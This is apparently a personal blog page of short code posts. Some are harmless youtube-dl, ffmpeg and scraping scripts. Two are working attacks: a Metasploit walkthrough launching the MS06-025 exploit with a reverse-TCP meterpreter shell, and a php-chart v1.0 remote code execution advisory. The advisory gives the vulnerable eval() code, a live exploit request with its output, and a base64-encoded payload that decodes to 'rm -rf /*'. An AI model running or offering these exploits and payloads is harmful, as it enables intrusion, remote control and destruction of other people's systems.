Posted by
jay
nmap --script smb-check-vulns.nse -p445 <host> sudo nmap -sU -sS --script smb-check-vulns.nse -p U:137,T:139 <host>Script Output
Host script results: | smb-check-vulns: | MS08-067: VULNERABLE | regsvc DoS: regsvc DoS: VULNERABLE | SMBv2 DoS (CVE-2009-3103): VULNERABLE | MS06-025: NO SERVICE (the Ras RPC service is inactive) |_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)$ msfconsole ## ### ## ## ## ## #### ###### #### ##### ##### ## #### ###### ####### ## ## ## ## ## ## ## ## ## ## ### ## ####### ###### ## ##### #### ## ## ## ## ## ## ## ## # ## ## ## ## ## ## ##### ## ## ## ## ## ## ## #### ### ##### ##### ## #### #### #### ### ## msf > use exploit/windows/smb/ms06_025_rras msf exploit(ms06_025_rras) > show payloads msf exploit(ms06_025_rras) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ms06_025_rras) > set LHOST [MY IP ADDRESS] msf exploit(ms06_025_rras) > set RHOST [TARGET IP] msf exploit(ms06_025_rras) > show targets msf exploit(ms06_025_rras) > set TARGET [TARGET ID] msf exploit(ms06_025_rras) > ex
Posted by
jay
#!/bin/bash
echo Enter the youtube url to begin downloading the video.
read VIDEO
echo What is the artist of the song?
read ARTIST
echo What is the name of the song?
read NAME
youtube-dl $VIDEO -o "${ARTIST} - ${NAME}.flv"
ffmpeg -i "${ARTIST} - ${NAME}.flv" -acodec libmp3lame -ac 2 -ab 128 -vn -y "${ARTIST} - ${NAME}.mp3"
rm -rf "${ARTIST} - ${NAME}.flv"
echo Your video is finally converted into a mp3!
##CHEERS! ;)
Posted by
jay
# On Ubuntu Linux terminal key in.
$ apt-get update && apt-get youtube-dl -y
$ ./youtube-dl -cit "[youtube playliste without the square bracket]"
# Enjoy ;)
Posted by
jay
#!/bin/bash
#This script is to lower the quality to save memory to watch movie / drama on your mobile.
for i in $(ls -1 *.avi); do
echo item: $i
ffmpeg -i $i -b 200k $i.mpg
done
Posted by
jay
#! /usr/bin/python
# install mechanize and BeautifulSoup
var = raw_input("Enter Your Intake Code: ")import urllib, urllib2, cookielibimport mechanizeimport reimport sysfrom BeautifulSoup import BeautifulSoupreload(sys)br = mechanize.Browser()getweb=br.open('http://webspace.apiit.edu.my/intake-timetable/').read()getwebspace = BeautifulSoup(getweb)scrapDate = re.compile('[0-9-]+.xml')listdate = re.findall(scrapDate,str(getwebspace))week = '%s'%(listdate[0])date = week.replace(".xml","")intake_Search_Week = ''selectIntakeAll = '%s' %(var)cj = cookielib.CookieJar()opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]opener.open('http://webspace.apiit.edu.my/intake-timetable/')post_data = urllib.urlencode({'week':week,'intake_Search_Week':intake_Search_Week,'selectIntakeAll':selectIntakeAll})log = opener.open('http://webspace.apiit.edu.my/intake-timetable/intake-result.php', post_data)logread = log.read()webspace = BeautifulSoup(logread)scrapSchedule = re.compile('<table class="timetable-display">\s*[A-z 0-9 \<\>,-:]+</table>')listwebspace = re.findall(scrapSchedule,str(webspace))webby = ('%s' % (listwebspace))webby.replace("[","").replace("]","")f = open('schedule%s.html'% date, 'w')htmlcode = ('%s' % (webby))f.write(htmlcode)f.close
Posted by
jay
===============================================================
Vulnerable Software: php-chart_v1.0
Official Site: http://php-charts.com/
Vuln: PHP Code Execution.
===============================================================
Tested On: Debian squeeze 6.0.6
Server version: Apache/2.2.16 (Debian)
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
================================================================
About Software:
Php-Charts is basically a class which can be used to generate
different charts(Bar, Pie, Doughnut etc.) in different format(PDF, PNG, JPG, HTML)
using different data source(csv, xml, MySQL, MS Sql, MS Access, PostgreSql,
user defined data).
================================================================
About vuln:
root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php
<?php
require("../lib/phpchart.class.php");
$color_var=array("txt_col","line_col","bg_color");
$cname=$_GET["type"];
$chart=new PHPChart($cname);
foreach($_GET as $key=>$value)
{
if($value!="")
{
if(in_array($key,$color_var))
eval('$chart->'.$key.'="#'.$value.'";');
else if($value=='yes')
eval('$chart->'.$key.'=true;');
else if($value=='no')
eval('$chart->'.$key.'=false;');
else if(is_numeric($value))
eval('$chart->'.$key.'='.$value.';');
else
eval('$chart->'.$key."='".$value."';");
}
}
$chart->genChart();
Exploitation:
root@debian:/tmp# wget 'http://hacker1.own//wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt
--2013-01-15 21:19:16-- http://hacker1.own//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “out.txt”
[ <=> ] 1,917 --.-K/s in 0s
2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]
Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4
array(28) {
["DOCUMENT_ROOT"]=>
string(28) "/etc/apache2/htdocs/hacker1/"
["GATEWAY_INTERFACE"]=>
string(7) "CGI/1.1"
["HTTP_ACCEPT"]=>
string(3) "*/*"
["HTTP_CLIENT_IP"]=>
string(9) "127.0.0.1"
["HTTP_HOST"]=>
string(11) "hacker1.own"
["HTTP_USER_AGENT"]=>
string(21) "Wget/1.12 (linux-gnu)"
["HTTP_VIA"]=>
string(77) "http/1.0 debian[FE800000000000000A0027FFFE077FC6] (ApacheTrafficServer/3.2.0)"
["HTTP_X_FORWARDED_FOR"]=>
string(9) "127.0.0.1"
["PATH"]=>
string(4) "/bin"
["PHPRC"]=>
string(14) "/etc/php5/cgi/"
["QUERY_STRING"]=>
string(45) "$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
["REDIRECT_STATUS"]=>
string(3) "200"
["REMOTE_ADDR"]=>
string(9) "127.0.0.1"
["REMOTE_PORT"]=>
string(5) "60830"
["REQUEST_METHOD"]=>
string(3) "GET"
["REQUEST_URI"]=>
string(76) "/wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY"
["SCRIPT_FILENAME"]=>
string(57) "/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php"
["SCRIPT_NAME"]=>
string(30) "/wp/chart/chart/wizard/url.php"
["SERVER_ADDR"]=>
string(9) "127.0.0.1"
["SERVER_ADMIN"]=>
string(21) "webmaster@hacker1.own"
["SERVER_NAME"]=>
string(11) "hacker1.own"
["SERVER_PORT"]=>
string(2) "80"
["SERVER_PROTOCOL"]=>
string(8) "HTTP/1.1"
["SERVER_SIGNATURE"]=>
string(0) ""
["SERVER_SOFTWARE"]=>
string(6) "Apache"
["UNIQUE_ID"]=>
string(24) "UPYOJH8AAQEAAE8eNfMAAAAC"
["PHP_SELF"]=>
string(30) "/wp/chart/chart/wizard/url.php"
["REQUEST_TIME"]=>
int(1358302756)
}
Notice: Undefined variable: in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
Fatal error: Cannot access empty property in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php(20) : eval()'d code on line 1
root@debian:/tmp#
Example 2:
http://hacker1.own//wp/chart/chart/wizard/url.php?&123&${var_dump(system(base64_decode(cm0gLXJmIC8q)))}=123456LoL
=====================ENDS HERE============================
Posted by
jay
